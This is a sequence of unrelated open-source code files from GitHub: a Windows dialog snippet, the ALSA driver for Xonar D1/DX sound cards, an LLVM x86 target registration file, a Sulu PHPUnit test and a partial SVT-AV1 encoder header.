   lpdit->cy = 50;
   lpdit->id = ID_USERTEXT; // Text identifier
   lpdit->style = ES_LEFT | WS_BORDER | WS_TABSTOP | WS_CHILD | WS_VISIBLE;
   lpw = (LPWORD)(lpdit + 1);
   *lpw++ = 0xFFFF;
   *lpw++ = 0x0081; // Text edit class
   *lpw++ = 0; // No creation data
   GlobalUnlock(hgbl);
   LRESULT ret = DialogBoxIndirect( hinst,
                                    (LPDLGTEMPLATE)hgbl,
                                    hwndOwner,
                                    (DLGPROC)MiniDumpDialogProc);
   GlobalFree(hgbl);
   return ret;
}
#endif | {
"pile_set_name": "Github"
} |
/*
* card driver for models with CS4398/CS4362A DACs (Xonar D1/DX)
*
* Copyright (c) Clemens Ladisch <[email protected]>
*
*
* This driver is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License, version 2.
*
* This driver is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this driver; if not, see <http://www.gnu.org/licenses/>.
*/
/*
* Xonar D1/DX
* -----------
*
* CMI8788:
*
* I²C <-> CS4398 (addr 1001111) (front)
* <-> CS4362A (addr 0011000) (surround, center/LFE, back)
*
* GPI 0 <- external power present (DX only)
*
* GPIO 0 -> enable output to speakers
* GPIO 1 -> route output to front panel
* GPIO 2 -> M0 of CS5361
* GPIO 3 -> M1 of CS5361
* GPIO 6 -> ?
* GPIO 7 -> ?
* GPIO 8 -> route input jack to line-in (0) or mic-in (1)
*
* CM9780:
*
* LINE_OUT -> input of ADC
*
* AUX_IN <- aux
* MIC_IN <- mic
* FMIC_IN <- front mic
*
* GPO 0 -> route line-in (0) or AC97 output (1) to CS5361 input
*/
#include <linux/pci.h>
#include <linux/delay.h>
#include <sound/ac97_codec.h>
#include <sound/control.h>
#include <sound/core.h>
#include <sound/pcm.h>
#include <sound/pcm_params.h>
#include <sound/tlv.h>
#include "xonar.h"
#include "cm9780.h"
#include "cs4398.h"
#include "cs4362a.h"
#define GPI_EXT_POWER 0x01
#define GPIO_D1_OUTPUT_ENABLE 0x0001
#define GPIO_D1_FRONT_PANEL 0x0002
#define GPIO_D1_MAGIC 0x00c0
#define GPIO_D1_INPUT_ROUTE 0x0100
#define I2C_DEVICE_CS4398 0x9e /* 10011, AD1=1, AD0=1, /W=0 */
#define I2C_DEVICE_CS4362A 0x30 /* 001100, AD0=0, /W=0 */
struct xonar_cs43xx {
struct xonar_generic generic;
u8 cs4398_regs[8];
u8 cs4362a_regs[15];
};
/*
 * Write a CS4398 (front DAC) register over I2C and mirror the value in the
 * driver's shadow copy so later writes can be skipped and the chip can be
 * reprogrammed after suspend/reset.
 */
static void cs4398_write(struct oxygen *chip, u8 reg, u8 value)
{
	struct xonar_cs43xx *data = chip->model_data;

	oxygen_write_i2c(chip, I2C_DEVICE_CS4398, reg, value);
	/* only registers 0..7 are cached */
	if (reg < ARRAY_SIZE(data->cs4398_regs))
		data->cs4398_regs[reg] = value;
}
/*
 * Write a CS4398 register, but skip the I2C transaction entirely when the
 * shadow copy shows the chip already holds this value.
 */
static void cs4398_write_cached(struct oxygen *chip, u8 reg, u8 value)
{
	struct xonar_cs43xx *data = chip->model_data;

	if (data->cs4398_regs[reg] == value)
		return;
	cs4398_write(chip, reg, value);
}
/*
 * Write a CS4362A (surround/center-LFE/back DAC) register over I2C and
 * mirror the value in the driver's shadow copy.
 */
static void cs4362a_write(struct oxygen *chip, u8 reg, u8 value)
{
	struct xonar_cs43xx *data = chip->model_data;

	oxygen_write_i2c(chip, I2C_DEVICE_CS4362A, reg, value);
	/* only registers 0..14 are cached */
	if (reg < ARRAY_SIZE(data->cs4362a_regs))
		data->cs4362a_regs[reg] = value;
}
/*
 * Write a CS4362A register, but skip the I2C transaction entirely when the
 * shadow copy shows the chip already holds this value.
 */
static void cs4362a_write_cached(struct oxygen *chip, u8 reg, u8 value)
{
	struct xonar_cs43xx *data = chip->model_data;

	if (data->cs4362a_regs[reg] == value)
		return;
	cs4362a_write(chip, reg, value);
}
/*
 * Program both DAC chips from the cached register values.  The chips are
 * kept powered down while being configured and are powered up only at the
 * end; this function is also used from resume to restore the hardware
 * state.  The write order follows the chips' power-down/configure/power-up
 * sequence and must not be rearranged.
 */
static void cs43xx_registers_init(struct oxygen *chip)
{
	struct xonar_cs43xx *data = chip->model_data;
	unsigned int i;

	/* set CPEN (control port mode) and power down */
	cs4398_write(chip, 8, CS4398_CPEN | CS4398_PDN);
	cs4362a_write(chip, 0x01, CS4362A_PDN | CS4362A_CPEN);
	/* configure */
	cs4398_write(chip, 2, data->cs4398_regs[2]);
	cs4398_write(chip, 3, CS4398_ATAPI_B_R | CS4398_ATAPI_A_L);
	cs4398_write(chip, 4, data->cs4398_regs[4]);
	cs4398_write(chip, 5, data->cs4398_regs[5]);
	cs4398_write(chip, 6, data->cs4398_regs[6]);
	cs4398_write(chip, 7, data->cs4398_regs[7]);
	cs4362a_write(chip, 0x02, CS4362A_DIF_LJUST);
	cs4362a_write(chip, 0x03, CS4362A_MUTEC_6 | CS4362A_AMUTE |
		      CS4362A_RMP_UP | CS4362A_ZERO_CROSS | CS4362A_SOFT_RAMP);
	cs4362a_write(chip, 0x04, data->cs4362a_regs[0x04]);
	cs4362a_write(chip, 0x05, 0);
	/* restore the mode/ATAPI and volume registers (6..14) */
	for (i = 6; i <= 14; ++i)
		cs4362a_write(chip, i, data->cs4362a_regs[i]);
	/* clear power down */
	cs4398_write(chip, 8, CS4398_CPEN);
	cs4362a_write(chip, 0x01, CS4362A_CPEN);
}
/*
 * One-time initialization for the Xonar D1: seed the DAC shadow registers
 * with their power-on defaults (muted, at the card's minimum volume --
 * the value 60 matches dac_volume_min = 127 - 60 in the model definition),
 * program the chips, and set up the card's GPIO routing.
 */
static void xonar_d1_init(struct oxygen *chip)
{
	struct xonar_cs43xx *data = chip->model_data;

	data->generic.anti_pop_delay = 800;
	data->generic.output_enable_bit = GPIO_D1_OUTPUT_ENABLE;
	/* CS4398 defaults: single-speed, no de-emphasis, left-justified data,
	 * both channels muted, soft-ramped zero-cross volume changes */
	data->cs4398_regs[2] =
		CS4398_FM_SINGLE | CS4398_DEM_NONE | CS4398_DIF_LJUST;
	data->cs4398_regs[4] = CS4398_MUTEP_LOW |
		CS4398_MUTE_B | CS4398_MUTE_A | CS4398_PAMUTE;
	data->cs4398_regs[5] = 60 * 2;	/* volume regs use twice the step size */
	data->cs4398_regs[6] = 60 * 2;
	data->cs4398_regs[7] = CS4398_RMP_DN | CS4398_RMP_UP |
		CS4398_ZERO_CROSS | CS4398_SOFT_RAMP;
	/* CS4362A defaults: registers 6/9/12 are the per-pair mode registers,
	 * 7/8, 10/11, 13/14 the corresponding volume registers */
	data->cs4362a_regs[4] = CS4362A_RMP_DN | CS4362A_DEM_NONE;
	data->cs4362a_regs[6] = CS4362A_FM_SINGLE |
		CS4362A_ATAPI_B_R | CS4362A_ATAPI_A_L;
	data->cs4362a_regs[7] = 60 | CS4362A_MUTE;
	data->cs4362a_regs[8] = 60 | CS4362A_MUTE;
	data->cs4362a_regs[9] = data->cs4362a_regs[6];
	data->cs4362a_regs[10] = 60 | CS4362A_MUTE;
	data->cs4362a_regs[11] = 60 | CS4362A_MUTE;
	data->cs4362a_regs[12] = data->cs4362a_regs[6];
	data->cs4362a_regs[13] = 60 | CS4362A_MUTE;
	data->cs4362a_regs[14] = 60 | CS4362A_MUTE;

	/* configure the controller's I2C bus before talking to the DACs */
	oxygen_write16(chip, OXYGEN_2WIRE_BUS_STATUS,
		       OXYGEN_2WIRE_LENGTH_8 |
		       OXYGEN_2WIRE_INTERRUPT_MASK |
		       OXYGEN_2WIRE_SPEED_FAST);

	cs43xx_registers_init(chip);

	/* drive the routing GPIOs as outputs, defaulting to rear output
	 * and line-in */
	oxygen_set_bits16(chip, OXYGEN_GPIO_CONTROL,
			  GPIO_D1_FRONT_PANEL |
			  GPIO_D1_MAGIC |
			  GPIO_D1_INPUT_ROUTE);
	oxygen_clear_bits16(chip, OXYGEN_GPIO_DATA,
			    GPIO_D1_FRONT_PANEL | GPIO_D1_INPUT_ROUTE);

	xonar_init_cs53x1(chip);
	xonar_enable_output(chip);

	snd_component_add(chip->card, "CS4398");
	snd_component_add(chip->card, "CS4362A");
	snd_component_add(chip->card, "CS5361");
}
/*
 * Initialization for the Xonar DX: identical to the D1 except that the DX
 * reports external power presence on GPI 0 (see the pinout comment at the
 * top of this file), so hook up external-power monitoring first.
 */
static void xonar_dx_init(struct oxygen *chip)
{
	struct xonar_cs43xx *data = chip->model_data;

	data->generic.ext_power_reg = OXYGEN_GPI_DATA;
	data->generic.ext_power_int_reg = OXYGEN_GPI_INTERRUPT_MASK;
	data->generic.ext_power_bit = GPI_EXT_POWER;
	xonar_init_ext_power(chip);
	xonar_d1_init(chip);
}
/*
 * Shut down: disable the output relay/amp, power down the CS4362A, and put
 * the codec function block into reset.
 */
static void xonar_d1_cleanup(struct oxygen *chip)
{
	xonar_disable_output(chip);
	cs4362a_write(chip, 0x01, CS4362A_PDN | CS4362A_CPEN);
	oxygen_clear_bits8(chip, OXYGEN_FUNCTION, OXYGEN_FUNCTION_RESET_CODEC);
}
/* Suspend uses exactly the same power-down sequence as cleanup. */
static void xonar_d1_suspend(struct oxygen *chip)
{
	xonar_d1_cleanup(chip);
}
/*
 * Resume: release the codec reset, give the hardware a moment to settle,
 * then restore both DACs from the cached register values and re-enable
 * the output.
 */
static void xonar_d1_resume(struct oxygen *chip)
{
	oxygen_set_bits8(chip, OXYGEN_FUNCTION, OXYGEN_FUNCTION_RESET_CODEC);
	msleep(1);
	cs43xx_registers_init(chip);
	xonar_enable_output(chip);
}
/*
 * Select the DACs' functional (speed) mode for the new sample rate:
 * single speed up to 50 kHz, double speed up to 100 kHz, quad speed above.
 * Only the FM bits are changed; the other bits of the cached mode
 * registers are preserved.  CS4362A register 9 is handled separately
 * because its ATAPI (channel-mix) bits may differ from registers 6/12
 * (see update_cs43xx_center_lfe_mix).
 */
static void set_cs43xx_params(struct oxygen *chip,
			      struct snd_pcm_hw_params *params)
{
	struct xonar_cs43xx *data = chip->model_data;
	u8 cs4398_fm, cs4362a_fm;

	if (params_rate(params) <= 50000) {
		cs4398_fm = CS4398_FM_SINGLE;
		cs4362a_fm = CS4362A_FM_SINGLE;
	} else if (params_rate(params) <= 100000) {
		cs4398_fm = CS4398_FM_DOUBLE;
		cs4362a_fm = CS4362A_FM_DOUBLE;
	} else {
		cs4398_fm = CS4398_FM_QUAD;
		cs4362a_fm = CS4362A_FM_QUAD;
	}
	cs4398_fm |= CS4398_DEM_NONE | CS4398_DIF_LJUST;
	cs4398_write_cached(chip, 2, cs4398_fm);
	cs4362a_fm |= data->cs4362a_regs[6] & ~CS4362A_FM_MASK;
	cs4362a_write_cached(chip, 6, cs4362a_fm);
	cs4362a_write_cached(chip, 12, cs4362a_fm);
	/* re-apply register 9's own non-FM bits on top of the new FM mode */
	cs4362a_fm &= CS4362A_FM_MASK;
	cs4362a_fm |= data->cs4362a_regs[9] & ~CS4362A_FM_MASK;
	cs4362a_write_cached(chip, 9, cs4362a_fm);
}
/*
 * Write the six CS4362A channel volumes (DAC channels 2..7).  The volume
 * registers are 7/8, 10/11 and 13/14 -- the expression 7 + i + i/2 skips
 * the interleaved mode registers 9 and 12.  The chip's scale is inverted
 * attenuation, hence 127 - volume; the mute bit lives in the same
 * registers.
 */
static void update_cs4362a_volumes(struct oxygen *chip)
{
	unsigned int i;
	u8 mute;

	mute = chip->dac_mute ? CS4362A_MUTE : 0;
	for (i = 0; i < 6; ++i)
		cs4362a_write_cached(chip, 7 + i + i / 2,
				     (127 - chip->dac_volume[2 + i]) | mute);
}
/*
 * Push all eight channel volumes to the hardware: the CS4398 carries the
 * front pair (registers 5/6, half-dB steps, hence * 2), the CS4362A the
 * remaining six channels.
 */
static void update_cs43xx_volume(struct oxygen *chip)
{
	cs4398_write_cached(chip, 5, (127 - chip->dac_volume[0]) * 2);
	cs4398_write_cached(chip, 6, (127 - chip->dac_volume[1]) * 2);
	update_cs4362a_volumes(chip);
}
/*
 * Apply the global DAC mute.  The CS4398 has dedicated mute bits in
 * register 4; the CS4362A's mute bits live inside its volume registers,
 * so the volumes are re-sent to update them.
 */
static void update_cs43xx_mute(struct oxygen *chip)
{
	u8 reg;

	reg = CS4398_MUTEP_LOW | CS4398_PAMUTE;
	if (chip->dac_mute)
		reg |= CS4398_MUTE_B | CS4398_MUTE_A;
	cs4398_write_cached(chip, 4, reg);
	update_cs4362a_volumes(chip);
}
/*
 * Toggle the channel routing (ATAPI bits) of the DAC pair addressed by
 * CS4362A register 9: either each output carries one channel, or both
 * outputs carry the left+right mix (used for the center/LFE mix control).
 */
static void update_cs43xx_center_lfe_mix(struct oxygen *chip, bool mixed)
{
	struct xonar_cs43xx *data = chip->model_data;
	u8 reg;

	reg = data->cs4362a_regs[9] & ~CS4362A_ATAPI_MASK;
	if (mixed)
		reg |= CS4362A_ATAPI_B_LR | CS4362A_ATAPI_A_LR;
	else
		reg |= CS4362A_ATAPI_B_R | CS4362A_ATAPI_A_L;
	cs4362a_write_cached(chip, 9, reg);
}
/*
 * Mixer switch that toggles GPIO 1 to route the output to the front-panel
 * header (see the GPIO pinout comment at the top of this file).
 */
static const struct snd_kcontrol_new front_panel_switch = {
	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
	.name = "Front Panel Playback Switch",
	.info = snd_ctl_boolean_mono_info,
	.get = xonar_gpio_bit_switch_get,
	.put = xonar_gpio_bit_switch_put,
	.private_value = GPIO_D1_FRONT_PANEL,
};
/* Enumerated control info: the DAC interpolation filter roll-off choices. */
static int rolloff_info(struct snd_kcontrol *ctl,
			struct snd_ctl_elem_info *info)
{
	static const char *const names[2] = {
		"Fast Roll-off", "Slow Roll-off"
	};

	return snd_ctl_enum_info(info, 1, 2, names);
}
/*
 * Report the current roll-off selection from the CS4398 shadow register;
 * the CS4362A is always kept in sync (see rolloff_put), so only one chip
 * needs to be consulted.
 */
static int rolloff_get(struct snd_kcontrol *ctl,
		       struct snd_ctl_elem_value *value)
{
	struct oxygen *chip = ctl->private_data;
	struct xonar_cs43xx *data = chip->model_data;

	value->value.enumerated.item[0] =
		(data->cs4398_regs[7] & CS4398_FILT_SEL) != 0;
	return 0;
}
/*
 * Change the DAC filter roll-off.  The chip mutex serializes access to the
 * shadow registers; when the setting actually changes, both DACs' filter
 * selection bits are updated together so they always agree.
 * Returns 1 when the hardware was changed, 0 otherwise.
 */
static int rolloff_put(struct snd_kcontrol *ctl,
		       struct snd_ctl_elem_value *value)
{
	struct oxygen *chip = ctl->private_data;
	struct xonar_cs43xx *data = chip->model_data;
	int changed;
	u8 reg;

	mutex_lock(&chip->mutex);
	reg = data->cs4398_regs[7];
	if (value->value.enumerated.item[0])
		reg |= CS4398_FILT_SEL;
	else
		reg &= ~CS4398_FILT_SEL;
	changed = reg != data->cs4398_regs[7];
	if (changed) {
		cs4398_write(chip, 7, reg);
		/* mirror the same selection into the CS4362A */
		if (reg & CS4398_FILT_SEL)
			reg = data->cs4362a_regs[0x04] | CS4362A_FILT_SEL;
		else
			reg = data->cs4362a_regs[0x04] & ~CS4362A_FILT_SEL;
		cs4362a_write(chip, 0x04, reg);
	}
	mutex_unlock(&chip->mutex);
	return changed;
}
/* Mixer control exposing the DAC filter roll-off selection. */
static const struct snd_kcontrol_new rolloff_control = {
	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
	.name = "DAC Filter Playback Enum",
	.info = rolloff_info,
	.get = rolloff_get,
	.put = rolloff_put,
};
/*
 * AC97 switch hook: when the line-in control is (un)muted, flip GPIO 8 so
 * the shared input jack is routed to mic-in (1) while line-in is muted,
 * and back to line-in (0) otherwise (see the pinout comment at the top of
 * this file).
 */
static void xonar_d1_line_mic_ac97_switch(struct oxygen *chip,
					  unsigned int reg, unsigned int mute)
{
	if (reg == AC97_LINE) {
		spin_lock_irq(&chip->reg_lock);
		oxygen_write16_masked(chip, OXYGEN_GPIO_DATA,
				      mute ? GPIO_D1_INPUT_ROUTE : 0,
				      GPIO_D1_INPUT_ROUTE);
		spin_unlock_irq(&chip->reg_lock);
	}
}
/* DAC volume scale: -60 dB .. 0 dB in 1 dB steps, no dedicated mute value */
static const DECLARE_TLV_DB_SCALE(cs4362a_db_scale, -6000, 100, 0);

/* Register the D1/DX-specific mixer controls (front panel, roll-off). */
static int xonar_d1_mixer_init(struct oxygen *chip)
{
	int err;

	err = snd_ctl_add(chip->card, snd_ctl_new1(&front_panel_switch, chip));
	if (err < 0)
		return err;
	err = snd_ctl_add(chip->card, snd_ctl_new1(&rolloff_control, chip));
	if (err < 0)
		return err;
	return 0;
}
/*
 * Append the cached CS4362A register values (0x01..0x0e) to the proc
 * buffer; register 0 does not exist on this chip.
 */
static void dump_cs4362a_registers(struct xonar_cs43xx *data,
				   struct snd_info_buffer *buffer)
{
	unsigned int reg;

	snd_iprintf(buffer, "\nCS4362A:");
	for (reg = 1; reg < 15; ++reg)
		snd_iprintf(buffer, " %02x", data->cs4362a_regs[reg]);
	snd_iprintf(buffer, "\n");
}
/*
 * proc dump for the D1/DX: CS4398 registers 2..7 (0 and 1 are not cached,
 * hence the "7?" placeholder) followed by the CS4362A registers.
 */
static void dump_d1_registers(struct oxygen *chip,
			      struct snd_info_buffer *buffer)
{
	struct xonar_cs43xx *data = chip->model_data;
	unsigned int i;

	snd_iprintf(buffer, "\nCS4398: 7?");
	for (i = 2; i < 8; ++i)
		snd_iprintf(buffer, " %02x", data->cs4398_regs[i]);
	snd_iprintf(buffer, "\n");
	dump_cs4362a_registers(data, buffer);
}
/*
 * Model description for the Xonar D1.  The DX reuses this table and only
 * overrides .init (see get_xonar_cs43xx_model).
 */
static const struct oxygen_model model_xonar_d1 = {
	.longname = "Asus Virtuoso 100",
	.chip = "AV200",
	.init = xonar_d1_init,
	.mixer_init = xonar_d1_mixer_init,
	.cleanup = xonar_d1_cleanup,
	.suspend = xonar_d1_suspend,
	.resume = xonar_d1_resume,
	.set_dac_params = set_cs43xx_params,
	.set_adc_params = xonar_set_cs53x1_params,
	.update_dac_volume = update_cs43xx_volume,
	.update_dac_mute = update_cs43xx_mute,
	.update_center_lfe_mix = update_cs43xx_center_lfe_mix,
	.ac97_switch = xonar_d1_line_mic_ac97_switch,
	.dump_registers = dump_d1_registers,
	.dac_tlv = cs4362a_db_scale,
	.model_data_size = sizeof(struct xonar_cs43xx),
	.device_config = PLAYBACK_0_TO_I2S |
			 PLAYBACK_1_TO_SPDIF |
			 CAPTURE_0_FROM_I2S_2 |
			 AC97_FMIC_SWITCH,
	.dac_channels_pcm = 8,
	.dac_channels_mixer = 8,
	/* volume range matches the 60-step attenuation used in xonar_d1_init */
	.dac_volume_min = 127 - 60,
	.dac_volume_max = 127,
	.function_flags = OXYGEN_FUNCTION_2WIRE,
	.dac_mclks = OXYGEN_MCLKS(256, 128, 128),
	.adc_mclks = OXYGEN_MCLKS(256, 128, 128),
	.dac_i2s_format = OXYGEN_I2S_FORMAT_LJUST,
	.adc_i2s_format = OXYGEN_I2S_FORMAT_LJUST,
};
/*
 * Probe helper: select the model description by PCI subdevice ID.
 * 0x834f is the Xonar D1; 0x8275 and 0x8327 are Xonar DX variants, which
 * use the same model but the DX-specific init.  Returns -EINVAL for
 * unknown subdevices.
 */
int __devinit get_xonar_cs43xx_model(struct oxygen *chip,
				     const struct pci_device_id *id)
{
	switch (id->subdevice) {
	case 0x834f:
		chip->model = model_xonar_d1;
		chip->model.shortname = "Xonar D1";
		break;
	case 0x8275:
	case 0x8327:
		chip->model = model_xonar_d1;
		chip->model.shortname = "Xonar DX";
		chip->model.init = xonar_dx_init;
		break;
	default:
		return -EINVAL;
	}
	return 0;
}
| {
"pile_set_name": "Github"
} |
//===-- X86TargetInfo.cpp - X86 Target Implementation ---------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
#include "MCTargetDesc/X86MCTargetDesc.h"
#include "llvm/Support/TargetRegistry.h"
using namespace llvm;
// The Target objects have static storage duration so the registry can keep
// referring to them for the lifetime of the process; they are filled in by
// the RegisterTarget helpers below.
Target llvm::TheX86_32Target, llvm::TheX86_64Target;

// Entry point invoked by LLVM's target-registration machinery to register
// the 32-bit and 64-bit x86 target descriptions (both advertise JIT support).
extern "C" void LLVMInitializeX86TargetInfo() {
  RegisterTarget<Triple::x86, /*HasJIT=*/true>
    X(TheX86_32Target, "x86", "32-bit X86: Pentium-Pro and above");

  RegisterTarget<Triple::x86_64, /*HasJIT=*/true>
    Y(TheX86_64Target, "x86-64", "64-bit X86: EM64T and AMD64");
}
| {
"pile_set_name": "Github"
} |
<?php
/*
* This file is part of Sulu.
*
* (c) Sulu GmbH
*
* This source file is subject to the MIT license that is bundled
* with this source code in the file LICENSE.
*/
namespace Sulu\Bundle\DocumentManagerBundle\Tests\Unit\DataFixtures;
use PHPUnit\Framework\TestCase;
use Sulu\Bundle\DocumentManagerBundle\DataFixtures\DocumentExecutor;
use Sulu\Bundle\DocumentManagerBundle\DataFixtures\DocumentFixtureInterface;
use Sulu\Bundle\DocumentManagerBundle\Initializer\Initializer;
use Sulu\Component\DocumentManager\DocumentManager;
use Symfony\Component\Console\Output\BufferedOutput;
class DocumentExecutorTest extends TestCase
{
    /**
     * Prophecy for the document manager handed to the executor.
     *
     * Declared explicitly: assigning undeclared ("dynamic") properties is
     * deprecated since PHP 8.2.
     */
    private $documentManager;

    /**
     * Prophecy for the workspace initializer.
     */
    private $initializer;

    /**
     * Buffered console output produced during execution.
     *
     * @var BufferedOutput
     */
    private $output;

    /**
     * Prophecy for a single document fixture.
     */
    private $fixture1;

    /**
     * The executor under test.
     *
     * @var DocumentExecutor
     */
    private $executer;

    public function setUp(): void
    {
        $this->documentManager = $this->prophesize(DocumentManager::class);
        $this->initializer = $this->prophesize(Initializer::class);
        $this->output = new BufferedOutput();
        $this->fixture1 = $this->prophesize(DocumentFixtureInterface::class);

        $this->executer = new DocumentExecutor(
            $this->documentManager->reveal(),
            $this->initializer->reveal(),
            $this->output
        );
    }

    /**
     * It should purge the workspace if required.
     */
    public function testPurge()
    {
        $this->initializer->initialize($this->output, true)->shouldNotBeCalled();
        $this->executer->execute([], true, false, $this->output);
    }

    /**
     * It should initialize the workspace if required.
     */
    public function testInitialize()
    {
        $this->initializer->initialize($this->output, false)->shouldBeCalled();
        $this->executer->execute([], false, true, $this->output);
    }

    /**
     * It should execute the fixtures.
     */
    public function testLoadFixtures()
    {
        $this->fixture1->load($this->documentManager->reveal())->shouldBeCalled();
        $this->executer->execute([$this->fixture1->reveal()], false, false, $this->output);
    }
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright(c) 2019 Intel Corporation
*
* This source code is subject to the terms of the BSD 2 Clause License and
* the Alliance for Open Media Patent License 1.0. If the BSD 2 Clause License
* was not distributed with this source code in the LICENSE file, you can
* obtain it at https://www.aomedia.org/license/software-license. If the Alliance for Open
* Media Patent License 1.0 was not distributed with this source code in the
* PATENTS file, you can obtain it at https://www.aomedia.org/license/patent-license.
*/
#ifndef EbEncodeContext_h
#define EbEncodeContext_h
#include <stdio.h>
#include "EbDefinitions.h"
#include "EbSvtAv1Enc.h"
#include "EbPictureDecisionReorderQueue.h"
#include "EbPictureDecisionQueue.h"
#include "EbPictureManagerQueue.h"
#include "EbPacketizationReorderQueue.h"
#include "EbInitialRateControlReorderQueue.h"
#include "EbPictureManagerReorderQueue.h"
#include "EbCabacContextModel.h"
#include "EbMdRateEstimation.h"
#include "EbPredictionStructure.h"
#include "EbRateControlTables.h"
#include "EbObject.h"
#include "encoder.h"
#include "firstpass.h"
// *Note - the queues are small for testing purposes. They should be increased when they are done.
#define PRE_ASSIGNMENT_MAX_DEPTH 128 // should be large enough to hold an entire prediction period
#define INPUT_QUEUE_MAX_DEPTH 5000
#define REFERENCE_QUEUE_MAX_DEPTH 5000
#define PICTURE_DECISION_PA_REFERENCE_QUEUE_MAX_DEPTH 5000
#define PICTURE_DECISION_REORDER_QUEUE_MAX_DEPTH 2048
#define INITIAL_RATE_CONTROL_REORDER_QUEUE_MAX_DEPTH 2048
#define PICTURE_MANAGER_REORDER_QUEUE_MAX_DEPTH 2048
#define HIGH_LEVEL_RATE_CONTROL_HISTOGRAM_QUEUE_MAX_DEPTH 2048
#define PACKETIZATION_REORDER_QUEUE_MAX_DEPTH 2048
// RC Groups: They should be a power of 2, so we can replace % by &.
// Instead of using x % y, we use x && (y-1)
#define PARALLEL_GOP_MAX_NUMBER 256
#define RC_GROUP_IN_GOP_MAX_NUMBER 512
#define PICTURE_IN_RC_GROUP_MAX_NUMBER 64
/* List of pictures (POC deltas) that depend on a reference picture. */
typedef struct DpbDependentList
{
    int32_t list[1 << MAX_TEMPORAL_LAYERS];  /* dependent-picture entries */
    uint32_t list_count;                     /* number of valid entries */
} DpbDependentList;
/* Bookkeeping for one decoded-picture-buffer slot. */
typedef struct DPBInfo {
    uint64_t picture_number;
    int32_t dep_count;         /* remaining pictures that reference this one */
    int32_t dep_list0_count;
    int32_t dep_list1_count;
    uint8_t temporal_layer_index;
    EbBool is_displayed;
    EbBool is_used;
    EbBool is_alt_ref;
    DpbDependentList dep_list0;
    DpbDependentList dep_list1;
} DPBInfo;
/* Growable array of first-pass statistics records. */
typedef struct FirstPassStatsOut {
    FIRSTPASS_STATS* stat;  /* record storage */
    size_t size;            /* number of records in use */
    size_t capability;      /* allocated capacity, in records */
} FirstPassStatsOut;
/*
 * Global encoder state shared between the pipeline processes: queues and
 * FIFOs connecting the stages, GOP/rate-control bookkeeping, and the
 * two-pass statistics buffers.
 */
typedef struct EncodeContext {
    EbDctor dctor;
    // Callback Functions
    EbCallback *app_callback_ptr;
    EbHandle total_number_of_recon_frame_mutex;
    uint64_t total_number_of_recon_frames;
    // Overlay input picture fifo
    EbFifo *overlay_input_picture_pool_fifo_ptr;
    // Output Buffer Fifos
    EbFifo *stream_output_fifo_ptr;
    EbFifo *recon_output_fifo_ptr;
    // Picture Buffer Fifos
    EbFifo *reference_picture_pool_fifo_ptr;
    EbFifo *pa_reference_picture_pool_fifo_ptr;
    // Picture Decision Reorder Queue
    PictureDecisionReorderEntry **picture_decision_reorder_queue;
    uint32_t picture_decision_reorder_queue_head_index;
    // Holds undisplayed frames for show-existing-frame; ordered by descending pts.
    EbObjectWrapper *picture_decision_undisplayed_queue[REF_FRAMES];
    uint32_t picture_decision_undisplayed_queue_count;
    // Picture Manager Pre-Assignment Buffer
    uint32_t pre_assignment_buffer_intra_count;
    uint32_t pre_assignment_buffer_idr_count;
    uint32_t pre_assignment_buffer_scene_change_count;
    uint32_t pre_assignment_buffer_scene_change_index;
    uint32_t pre_assignment_buffer_eos_flag;
    uint64_t decode_base_number;
    EbObjectWrapper **pre_assignment_buffer;
    uint32_t pre_assignment_buffer_count;
    // Picture Decision Circular Queues
    PaReferenceQueueEntry **picture_decision_pa_reference_queue;
    uint32_t picture_decision_pa_reference_queue_head_index;
    uint32_t picture_decision_pa_reference_queue_tail_index;
    // Picture Manager Circular Queues
    InputQueueEntry ** input_picture_queue;
    uint32_t input_picture_queue_head_index;
    uint32_t input_picture_queue_tail_index;
    ReferenceQueueEntry **reference_picture_queue;
    uint32_t reference_picture_queue_head_index;
    uint32_t reference_picture_queue_tail_index;
    // Initial Rate Control Reorder Queue
    InitialRateControlReorderEntry **initial_rate_control_reorder_queue;
    uint32_t initial_rate_control_reorder_queue_head_index;
    uint32_t dep_q_head;
    uint32_t dep_q_tail;
    PicQueueEntry **dep_cnt_picture_queue; // buffer to store all pictures needing dependent-count clean-up in PicMgr
    // High Level Rate Control Histogram Queue
    HlRateControlHistogramEntry **hl_rate_control_historgram_queue;
    uint32_t hl_rate_control_historgram_queue_head_index;
    EbHandle hl_rate_control_historgram_queue_mutex;
    // Packetization Reorder Queue
    PacketizationReorderEntry **packetization_reorder_queue;
    uint32_t packetization_reorder_queue_head_index;
    // GOP Counters
    uint32_t intra_period_position; // Current position in intra period
    uint32_t pred_struct_position; // Current position within a prediction structure
    uint32_t elapsed_non_idr_count;
    uint32_t elapsed_non_cra_count;
    int64_t current_input_poc;
    EbBool initial_picture;
    uint64_t last_idr_picture; // the most recently occurred IDR picture (in decode order)
    // Sequence Termination Flags
    uint64_t terminating_picture_number;
    EbBool terminating_sequence_flag_received;
    // Signals the need for a td structure to be written in the bitstream - only used in the PK process so no need for a mutex
    EbBool td_needed;
    // Prediction Structure
    PredictionStructureGroup *prediction_structure_group_ptr;
    // Rate Control Bit Tables
    RateControlTables *rate_control_tables_array;
    EbBool rate_control_tables_array_updated;
    EbHandle rate_table_update_mutex;
    // Speed Control
    int64_t sc_buffer;
    int64_t sc_frame_in;
    int64_t sc_frame_out;
    EbHandle sc_buffer_mutex;
    EbEncMode enc_mode;
    // Rate Control
    uint32_t previous_selected_ref_qp;
    uint64_t max_coded_poc;
    uint32_t max_coded_poc_selected_ref_qp;
    // Dynamic GOP
    uint32_t previous_mini_gop_hierarchical_levels;
    EbObjectWrapper *previous_picture_control_set_wrapper_ptr;
    EbHandle shared_reference_mutex;
    uint64_t picture_number_alt; // The picture number overlay; includes all the overlay frames
    EbHandle stat_file_mutex;
    // DPB list management
    DPBInfo dpb_list[REF_FRAMES];
    uint64_t display_picture_number;
    EbBool is_mini_gop_changed;
    EbBool is_i_slice_in_last_mini_gop;
    uint64_t i_slice_picture_number_in_last_mini_gop;
    uint64_t poc_map_idx[MAX_TPL_LA_SW];
